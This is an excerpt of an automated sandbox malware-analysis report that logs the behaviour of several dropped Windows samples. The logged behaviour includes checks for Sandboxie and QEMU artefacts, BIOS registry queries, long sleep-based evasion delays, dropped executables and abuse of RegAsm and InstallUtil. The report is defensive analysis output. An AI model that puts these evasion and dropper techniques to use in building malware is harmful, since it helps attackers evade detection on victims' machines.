                        Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 0000002A.00000002.4703878971.0000000012DF1000.00000004.00000800.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 0000002A.00000000.3476472138.0000000000BF2000.00000002.00000001.01000000.00000014.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe.28.drBinary or memory string: SBIEDLL.DLLCYPRXF4YDFY6QMQHUAXZT5XLEAGZGVJ3A0GTSHCUZNG06Y5STECU0VFHSQJW8F9JVXKHIZOE3AKCLUOQWFHDGCKXZU8MLY2AIRDMC4ZKAOLOTU0OP35YNQFJXNACVRI1O5YC8G65GRE3VQLU3ILCNNCDKTAI1U61CGKVFHFGDS6ABUAJ4CPKYCVYNZFVRTG8CHS1VDCZCHBDLKTDPNQWQKMSFLTBTZNXIDYAJWWSIZWFBCL7VYZ2LPUJ3GCJHXOE42DJINC9H5K5AGSJQMP8HV7AX4J94NTHIOF0K5ACLEKPCPSFME7TKJRC45CKXXDHYXUEKBVGDJLHVKZY5XDQVJBCFQ9OOUCCEEILJSWQUHXZ8S2UYL5DT63P3LIW7SPVRA0ABTNT91H5XMQ1C7F8XHDDJNWN6EOHW3HG9SOGOGADEQA5U71OGSHQYSBBEV6LPZC3C0VGSTLA8FFNOWMZA72I0XSI7ALQJN2HFITO6ZQFFB87JJA3CETI1BTNOUIRFPUCCHJ2LGWTHJYAGJI7PFFCOSVPKFZOOFBBPNCE1LYP96B0AVSJD670IMO5OC4IRI8OAPZAAJH5KZXI4Q8EXPPSCHX0GTXXDRQ6PJXSK6NWIOUQLPSUWJX4CNVETJSLZNPUS1JKDWCYP93OZBIIMYY4PG58CDFARWFX1YWVGE1PJ8LZR9TMVNUVEGAACJJNTK9EXVQA7K4AU4N4RZIZRTGDKNT9XUK8PUI6GT1KPGERR9INFO
                        Source: Cerker.exe, 0000001B.00000002.3268115258.00000000001CD000.00000004.00000010.00020000.00000000.sdmp, Cerker.exe, 00000028.00000002.3447790560.00000000006EC000.00000004.00000010.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 0000002A.00000002.4674057559.0000000002DE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                        Source: Cerker.exe, 0000001B.00000002.3268115258.00000000001CD000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: QSBIEDLL.DLL
                        Source: kitty.exe, 00000018.00000002.3280507784.0000000000DE9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: VSBIEDLL.DLL
                        Source: InstallUtil.exe, 00000032.00000002.3758938143.00000000033CE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \QEMU-GA.EXE
                        Source: InstallUtil.exe, 00000032.00000002.3758938143.00000000033CE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \QEMU-GA.EXE@\JQ
                        Source: InstallUtil.exe, 00000032.00000002.3758938143.00000000033CE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \QEMU-GA.EXE`,JQ
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeMemory allocated: F50000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exeMemory allocated: 1AB60000 memory reserve | memory write watch
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeMemory allocated: F60000 memory reserve | memory write watch
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeMemory allocated: 1B030000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exeMemory allocated: 220B75C0000 memory reserve | memory write watch
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeMemory allocated: 1240000 memory reserve | memory write watch
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeMemory allocated: 1ADE0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exeMemory allocated: 22C0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exeMemory allocated: 2400000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exeMemory allocated: 4400000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 11D0000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2DB0000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 4DB0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exeMemory allocated: 2730000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exeMemory allocated: 27A0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exeMemory allocated: 47A0000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 16A0000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 32D0000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 52D0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                        Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 922337203685477
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 600000
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 599876
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 599748
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 599593
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 599475
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 599359
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 599192
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 598829
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 598466
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 598275
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 598122
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 597959
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 597755
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 597609
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 597491
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 597372
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 597219
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 597090
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 596969
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 596831
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 596712
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 596566
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 596440
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 596323
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 596204
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 596070
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 595880
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 595695
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 595055
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 594851
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 594684
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 594568
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 594447
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 594326
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 594205
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 594044
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 593923
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 593802
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 593666
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 593555
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 593395
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 593270
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 593136
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 593024
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 592894
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 592725
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 592572
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 592428
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 591935
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 591600
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 591422
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 591314
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 591188
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 591072
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 590942
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 590798
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 590645
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 590517
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 590400
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 590274
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 590129
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 589991
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 589830
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 589589
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 589386
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 589203
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 589102
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 588969
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 588832
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 588576
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 588213
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 587769
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 587619
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 587501
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 587354
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 587144
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 586881
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 586638
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 586470
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 586314
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 586105
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 585905
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 585639
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 585310
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 584895
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 584640
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 584477
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 584286
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeThread delayed: delay time: 584155
                        Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeWindow / User API: threadDelayed 568
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeWindow / User API: threadDelayed 5552
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeWindow / User API: threadDelayed 4100
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeWindow / User API: threadDelayed 1634
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000221001\exbuild.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\exbuild[1].exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000260001\Channel1.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeDropped PE file which has not been started: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\WIDeqOfZq9.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000223001\36f677264b.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Channel1[1].exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\D0nMCdvUeB.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\BowExpert[1].exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000255001\channel2.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeDropped PE file which has not been started: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\channel2[1].exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pifDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000256001\BowExpert.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scrAPI coverage: 4.7 %
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeAPI coverage: 7.3 %
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeAPI coverage: 4.8 %
                        Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exeAPI coverage: 3.7 %
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif TID: 7584Thread sleep time: -900000s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif TID: 7632Thread sleep time: -180000s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif TID: 7584Thread sleep time: -30000s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe TID: 7324Thread sleep count: 568 > 30
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe TID: 7324Thread sleep time: -5680000s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe TID: 2284Thread sleep time: -60000s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 5536Thread sleep time: -90918s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -24903104499507879s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -600000s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -599876s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 1120Thread sleep count: 5552 > 30
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -599748s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 1120Thread sleep count: 4100 > 30
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -599593s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -599475s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -599359s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 5536Thread sleep time: -88365s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -599192s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -598829s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -598466s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -598275s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -598122s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -597959s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -597755s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -597609s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -597491s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -597372s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -597219s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -597090s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -596969s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -596831s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -596712s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -596566s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -596440s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -596323s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -596204s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -596070s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -595880s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -595695s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -595055s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -594851s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -594684s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -594568s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -594447s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -594326s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -594205s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -594044s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -593923s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -593802s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -593666s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 5536Thread sleep time: -87631s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -593555s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -593395s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -593270s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -593136s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -593024s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -592894s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -592725s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -592572s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -592428s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -591935s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -591600s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -591422s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -591314s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -591188s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -591072s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -590942s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -590798s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -590645s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -590517s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -590400s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -590274s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -590129s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -589991s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -589830s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -589589s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -589386s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -589203s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -589102s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -588969s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -588832s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -588576s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -588213s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 5536Thread sleep time: -96076s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -587769s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -587619s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -587501s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -587354s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -587144s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -586881s >= -30000s
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe TID: 4208Thread sleep time: -586638s >= -30000s
